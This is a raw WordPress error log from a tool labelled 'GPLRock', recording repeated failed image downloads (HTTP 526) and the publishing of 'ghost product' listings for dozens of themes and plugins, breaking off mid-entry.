https://meldwp.com/wp-content/uploads/sushifushi---japanese--asian-restaurant-wordpress-theme-7112.webp for product sushifushi-japanese-asian-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:09 UTC] GPLRock: Image download failed for product sushifushi-japanese-asian-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:11 UTC] GPLRock: Image download failed for product sushifushi-japanese-asian-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sushifushi---japanese--asian-restaurant-wordpress-theme-7112.webp for product sushifushi-japanese-asian-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:13 UTC] GPLRock WARNING: Image download failed for product sushifushi-japanese-asian-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sushifushi---japanese--asian-restaurant-wordpress-theme-7112.webp [05-Apr-2026 15:40:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sushifushi-japanese-asian-restaurant-wordpress-theme [05-Apr-2026 15:40:14 UTC] GPLRock: Image download failed for product datebook-dating-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:16 UTC] GPLRock: Image download failed for product datebook-dating-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/datebook---dating-wordpress-theme-2072.webp for product datebook-dating-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:18 UTC] GPLRock: Image download failed for product datebook-dating-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:20 UTC] GPLRock: Image download failed for product datebook-dating-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/datebook---dating-wordpress-theme-2072.webp for product datebook-dating-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:22 UTC] GPLRock WARNING: Image download failed for product datebook-dating-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/datebook---dating-wordpress-theme-2072.webp [05-Apr-2026 15:40:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: datebook-dating-wordpress-theme [05-Apr-2026 15:40:22 UTC] GPLRock: Image downloaded successfully for product syra-minimal-showcase-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-43cb5309.webp [05-Apr-2026 15:40:22 UTC] GPLRock: Using pre-downloaded image for product syra-minimal-showcase-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-43cb5309.webp [05-Apr-2026 15:40:22 UTC] GPLRock: Ghost product published with image - Product ID: syra-minimal-showcase-portfolio-wordpress-theme [05-Apr-2026 15:40:22 UTC] GPLRock: Image download failed for product newark-writing-and-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:25 UTC] GPLRock: Image download failed for product newark-writing-and-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newark---writing-and-personal-blog-wordpress-theme-26400.webp for product newark-writing-and-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:27 UTC] GPLRock: Image download failed for product newark-writing-and-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:29 UTC] GPLRock: Image download failed for product newark-writing-and-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newark---writing-and-personal-blog-wordpress-theme-26400.webp for product newark-writing-and-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:31 UTC] GPLRock WARNING: Image download failed for product newark-writing-and-personal-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/newark---writing-and-personal-blog-wordpress-theme-26400.webp [05-Apr-2026 15:40:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newark-writing-and-personal-blog-wordpress-theme [05-Apr-2026 15:40:31 UTC] GPLRock: Image download failed for product aruba-minimal-ajax-wordpress-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:33 UTC] GPLRock: Image download failed for product aruba-minimal-ajax-wordpress-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aruba---minimal-ajax-wordpress-portfolio-theme-33073.webp for product aruba-minimal-ajax-wordpress-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:35 UTC] GPLRock: Image download failed for product aruba-minimal-ajax-wordpress-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:38 UTC] GPLRock: Image download failed for product aruba-minimal-ajax-wordpress-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aruba---minimal-ajax-wordpress-portfolio-theme-33073.webp for product aruba-minimal-ajax-wordpress-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:40 UTC] GPLRock WARNING: Image download failed for product aruba-minimal-ajax-wordpress-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/aruba---minimal-ajax-wordpress-portfolio-theme-33073.webp [05-Apr-2026 15:40:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aruba-minimal-ajax-wordpress-portfolio-theme [05-Apr-2026 15:40:40 UTC] GPLRock: Image download failed for product colibro-multipurpose-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:42 UTC] GPLRock: Image download failed for product colibro-multipurpose-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/colibro---multipurpose-portfolio-wordpress-theme-13185.webp for product colibro-multipurpose-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:44 UTC] GPLRock: Image download failed for product colibro-multipurpose-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:46 UTC] GPLRock: Image download failed for product colibro-multipurpose-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/colibro---multipurpose-portfolio-wordpress-theme-13185.webp for product colibro-multipurpose-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:48 UTC] GPLRock WARNING: Image download failed for product colibro-multipurpose-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/colibro---multipurpose-portfolio-wordpress-theme-13185.webp [05-Apr-2026 15:40:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: colibro-multipurpose-portfolio-wordpress-theme [05-Apr-2026 15:40:48 UTC] GPLRock: Image download failed for product tekz-technology-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:51 UTC] GPLRock: Image download failed for product tekz-technology-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tekz---technology--it-solutions-wordpress-theme-10167.webp for product tekz-technology-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:53 UTC] GPLRock: Image download failed for product tekz-technology-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:55 UTC] GPLRock: Image download failed for product tekz-technology-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tekz---technology--it-solutions-wordpress-theme-10167.webp for product tekz-technology-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:40:57 UTC] GPLRock WARNING: Image download failed for product tekz-technology-it-solutions-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tekz---technology--it-solutions-wordpress-theme-10167.webp [05-Apr-2026 15:40:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tekz-technology-it-solutions-wordpress-theme [05-Apr-2026 15:40:57 UTC] GPLRock: Image download failed for product storyblog-wordpress-theme-for-story-tellers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:59 UTC] GPLRock: Image download failed for product storyblog-wordpress-theme-for-story-tellers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:41:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/storyblog---wordpress-theme-for-story-tellers-18036.webp for product storyblog-wordpress-theme-for-story-tellers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:41:02 UTC] GPLRock: Image download failed for product storyblog-wordpress-theme-for-story-tellers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:41:04 UTC] GPLRock: Image download failed for product storyblog-wordpress-theme-for-story-tellers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:41:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/storyblog---wordpress-theme-for-story-tellers-18036.webp for product storyblog-wordpress-theme-for-story-tellers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:41:06 UTC] GPLRock WARNING: Image download failed for product storyblog-wordpress-theme-for-story-tellers. URL: https://meldwp.com/wp-content/uploads/storyblog---wordpress-theme-for-story-tellers-18036.webp [05-Apr-2026 15:41:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: storyblog-wordpress-theme-for-story-tellers [05-Apr-2026 15:41:06 UTC] GPLRock: Image download failed for product areia-portfolio-and-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:41:08 UTC] GPLRock: Image download failed for product areia-portfolio-and-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:41:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/areia---portfolio-and-agency-wordpress-theme-25019.webp for product areia-portfolio-and-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:41:10 UTC] GPLRock: Image download failed for product areia-portfolio-and-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:41:12 UTC] GPLRock: Image download failed for product areia-portfolio-and-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:41:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/areia---portfolio-and-agency-wordpress-theme-25019.webp for product areia-portfolio-and-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:41:14 UTC] GPLRock WARNING: Image download failed for product areia-portfolio-and-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/areia---portfolio-and-agency-wordpress-theme-25019.webp [05-Apr-2026 15:41:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: areia-portfolio-and-agency-wordpress-theme [05-Apr-2026 15:42:03 UTC] GPLRock: Image download failed for product support-automator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:05 UTC] GPLRock: Image download failed for product support-automator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/support-automator-614.webp for product support-automator after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:07 UTC] GPLRock: Image download failed for product support-automator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:09 UTC] GPLRock: Image download failed for product support-automator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/support-automator-614.webp for product support-automator after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:12 UTC] GPLRock WARNING: Image download failed for product support-automator. URL: https://meldwp.com/wp-content/uploads/support-automator-614.webp [05-Apr-2026 15:42:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: support-automator [05-Apr-2026 15:42:12 UTC] GPLRock: Image download failed for product modern-video-reel-amazon-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:14 UTC] GPLRock: Image download failed for product modern-video-reel-amazon-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-video-reel-amazon-addon-29941.webp for product modern-video-reel-amazon-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:16 UTC] GPLRock: Image download failed for product modern-video-reel-amazon-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:18 UTC] GPLRock: Image download failed for product modern-video-reel-amazon-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-video-reel-amazon-addon-29941.webp for product modern-video-reel-amazon-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:20 UTC] GPLRock WARNING: Image download failed for product modern-video-reel-amazon-addon. URL: https://meldwp.com/wp-content/uploads/modern-video-reel-amazon-addon-29941.webp [05-Apr-2026 15:42:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modern-video-reel-amazon-addon [05-Apr-2026 15:42:20 UTC] GPLRock: Image download failed for product tabletrack-the-complete-saas-restaurant-management-solution (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:22 UTC] GPLRock: Image download failed for product tabletrack-the-complete-saas-restaurant-management-solution (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tabletrack---the-complete-saas-restaurant-management-solution-13497.webp for product tabletrack-the-complete-saas-restaurant-management-solution after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:25 UTC] GPLRock: Image download failed for product tabletrack-the-complete-saas-restaurant-management-solution (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:27 UTC] GPLRock: Image download failed for product tabletrack-the-complete-saas-restaurant-management-solution (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tabletrack---the-complete-saas-restaurant-management-solution-13497.webp for product tabletrack-the-complete-saas-restaurant-management-solution after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:29 UTC] GPLRock WARNING: Image download failed for product tabletrack-the-complete-saas-restaurant-management-solution. URL: https://meldwp.com/wp-content/uploads/tabletrack---the-complete-saas-restaurant-management-solution-13497.webp [05-Apr-2026 15:42:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tabletrack-the-complete-saas-restaurant-management-solution [05-Apr-2026 15:42:29 UTC] GPLRock: Image download failed for product firemobile-wordpress-woocommerce-firebase-mobile-otp-authentication (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:31 UTC] GPLRock: Image download failed for product firemobile-wordpress-woocommerce-firebase-mobile-otp-authentication (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/firemobile--wordpress--woocommerce-firebase-mobile-otp-authentication-13447.webp for product firemobile-wordpress-woocommerce-firebase-mobile-otp-authentication after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:33 UTC] GPLRock: Image download failed for product firemobile-wordpress-woocommerce-firebase-mobile-otp-authentication (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:35 UTC] GPLRock: Image download failed for product firemobile-wordpress-woocommerce-firebase-mobile-otp-authentication (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/firemobile--wordpress--woocommerce-firebase-mobile-otp-authentication-13447.webp for product firemobile-wordpress-woocommerce-firebase-mobile-otp-authentication after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:38 UTC] GPLRock WARNING: Image download failed for product firemobile-wordpress-woocommerce-firebase-mobile-otp-authentication. URL: https://meldwp.com/wp-content/uploads/firemobile--wordpress--woocommerce-firebase-mobile-otp-authentication-13447.webp [05-Apr-2026 15:42:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: firemobile-wordpress-woocommerce-firebase-mobile-otp-authentication [05-Apr-2026 15:42:38 UTC] GPLRock: Image download failed for product worksuite-hr-crm-and-project-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:40 UTC] GPLRock: Image download failed for product worksuite-hr-crm-and-project-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/worksuite---hr-crm-and-project-management-21273.webp for product worksuite-hr-crm-and-project-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:42 UTC] GPLRock: Image download failed for product worksuite-hr-crm-and-project-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:44 UTC] GPLRock: Image download failed for product worksuite-hr-crm-and-project-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/worksuite---hr-crm-and-project-management-21273.webp for product worksuite-hr-crm-and-project-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:46 UTC] GPLRock WARNING: Image download failed for product worksuite-hr-crm-and-project-management. URL: https://meldwp.com/wp-content/uploads/worksuite---hr-crm-and-project-management-21273.webp [05-Apr-2026 15:42:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: worksuite-hr-crm-and-project-management [05-Apr-2026 15:42:46 UTC] GPLRock: Image download failed for product interactive-svg-usa-map (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:48 UTC] GPLRock: Image download failed for product interactive-svg-usa-map (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interactive-svg-usa-map-16196.webp for product interactive-svg-usa-map after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:51 UTC] GPLRock: Image download failed for product interactive-svg-usa-map (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:53 UTC] GPLRock: Image download failed for product interactive-svg-usa-map (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interactive-svg-usa-map-16196.webp for product interactive-svg-usa-map after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:55 UTC] GPLRock WARNING: Image download failed for product interactive-svg-usa-map. URL: https://meldwp.com/wp-content/uploads/interactive-svg-usa-map-16196.webp [05-Apr-2026 15:42:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: interactive-svg-usa-map [05-Apr-2026 15:42:55 UTC] GPLRock: Image download failed for product woocommerce-auctions-wordpress-simple-auctions (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:57 UTC] GPLRock: Image download failed for product woocommerce-auctions-wordpress-simple-auctions (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:42:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-auctions---wordpress-simple-auctions-29404.webp for product woocommerce-auctions-wordpress-simple-auctions after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:42:59 UTC] GPLRock: Image download failed for product woocommerce-auctions-wordpress-simple-auctions (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:01 UTC] GPLRock: Image download failed for product woocommerce-auctions-wordpress-simple-auctions (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-auctions---wordpress-simple-auctions-29404.webp for product woocommerce-auctions-wordpress-simple-auctions after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:43:04 UTC] GPLRock WARNING: Image download failed for product woocommerce-auctions-wordpress-simple-auctions. URL: https://meldwp.com/wp-content/uploads/woocommerce-auctions---wordpress-simple-auctions-29404.webp [05-Apr-2026 15:43:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-auctions-wordpress-simple-auctions [05-Apr-2026 15:43:04 UTC] GPLRock: Image downloaded successfully for product woocommerce-vinyl-stickers-labels-design (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-03838c0d.webp [05-Apr-2026 15:43:04 UTC] GPLRock: Using pre-downloaded image for product woocommerce-vinyl-stickers-labels-design: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-03838c0d.webp [05-Apr-2026 15:43:04 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-vinyl-stickers-labels-design [05-Apr-2026 15:43:04 UTC] GPLRock: Image download failed for product ashelement-elementor-page-builder-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:06 UTC] GPLRock: Image download failed for product ashelement-elementor-page-builder-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ashelement-elementor-page-builder-bundle-15906.webp for product ashelement-elementor-page-builder-bundle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:43:08 UTC] GPLRock: Image download failed for product ashelement-elementor-page-builder-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:10 UTC] GPLRock: Image download failed for product ashelement-elementor-page-builder-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ashelement-elementor-page-builder-bundle-15906.webp for product ashelement-elementor-page-builder-bundle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:43:12 UTC] GPLRock WARNING: Image download failed for product ashelement-elementor-page-builder-bundle. URL: https://meldwp.com/wp-content/uploads/ashelement-elementor-page-builder-bundle-15906.webp [05-Apr-2026 15:43:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ashelement-elementor-page-builder-bundle [05-Apr-2026 15:43:13 UTC] GPLRock: Image download failed for product hats-virtual-try-on-popup-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:15 UTC] GPLRock: Image download failed for product hats-virtual-try-on-popup-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hats-virtual-try-on-popup--woocommerce-wordpress-26958.webp for product hats-virtual-try-on-popup-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:43:17 UTC] GPLRock: Image download failed for product hats-virtual-try-on-popup-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:19 UTC] GPLRock: Image download failed for product hats-virtual-try-on-popup-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:43:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hats-virtual-try-on-popup--woocommerce-wordpress-26958.webp for product hats-virtual-try-on-popup-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:43:21 UTC] GPLRock WARNING: Image download failed for product hats-virtual-try-on-popup-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/hats-virtual-try-on-popup--woocommerce-wordpress-26958.webp [05-Apr-2026 15:43:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hats-virtual-try-on-popup-woocommerce-wordpress [05-Apr-2026 15:44:01 UTC] GPLRock: Image download failed for product falcons-directory-for-lawyers-law-firms-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:03 UTC] GPLRock: Image download failed for product falcons-directory-for-lawyers-law-firms-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/falcons---directory-for-lawyers--law-firms-wordpress-theme-18849.webp for product falcons-directory-for-lawyers-law-firms-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:05 UTC] GPLRock: Image download failed for product falcons-directory-for-lawyers-law-firms-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:07 UTC] GPLRock: Image download failed for product falcons-directory-for-lawyers-law-firms-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/falcons---directory-for-lawyers--law-firms-wordpress-theme-18849.webp for product falcons-directory-for-lawyers-law-firms-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:09 UTC] GPLRock WARNING: Image download failed for product falcons-directory-for-lawyers-law-firms-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/falcons---directory-for-lawyers--law-firms-wordpress-theme-18849.webp [05-Apr-2026 15:44:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: falcons-directory-for-lawyers-law-firms-wordpress-theme [05-Apr-2026 15:44:10 UTC] GPLRock: Image download failed for product datix-ai-data-science-analytics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:12 UTC] GPLRock: Image download failed for product datix-ai-data-science-analytics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/datix---ai-data-science--analytics-wordpress-theme-15407.webp for product datix-ai-data-science-analytics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:14 UTC] GPLRock: Image download failed for product datix-ai-data-science-analytics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:16 UTC] GPLRock: Image download failed for product datix-ai-data-science-analytics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/datix---ai-data-science--analytics-wordpress-theme-15407.webp for product datix-ai-data-science-analytics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:18 UTC] GPLRock WARNING: Image download failed for product datix-ai-data-science-analytics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/datix---ai-data-science--analytics-wordpress-theme-15407.webp [05-Apr-2026 15:44:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: datix-ai-data-science-analytics-wordpress-theme [05-Apr-2026 15:44:18 UTC] GPLRock: Image download failed for product appone-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:20 UTC] GPLRock: Image download failed for product appone-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appone---app-landing-wordpress-theme-20723.webp for product appone-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:23 UTC] GPLRock: Image download failed for product appone-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:25 UTC] GPLRock: Image download failed for product appone-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appone---app-landing-wordpress-theme-20723.webp for product appone-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:27 UTC] GPLRock WARNING: Image download failed for product appone-app-landing-wordpress-theme. URL: 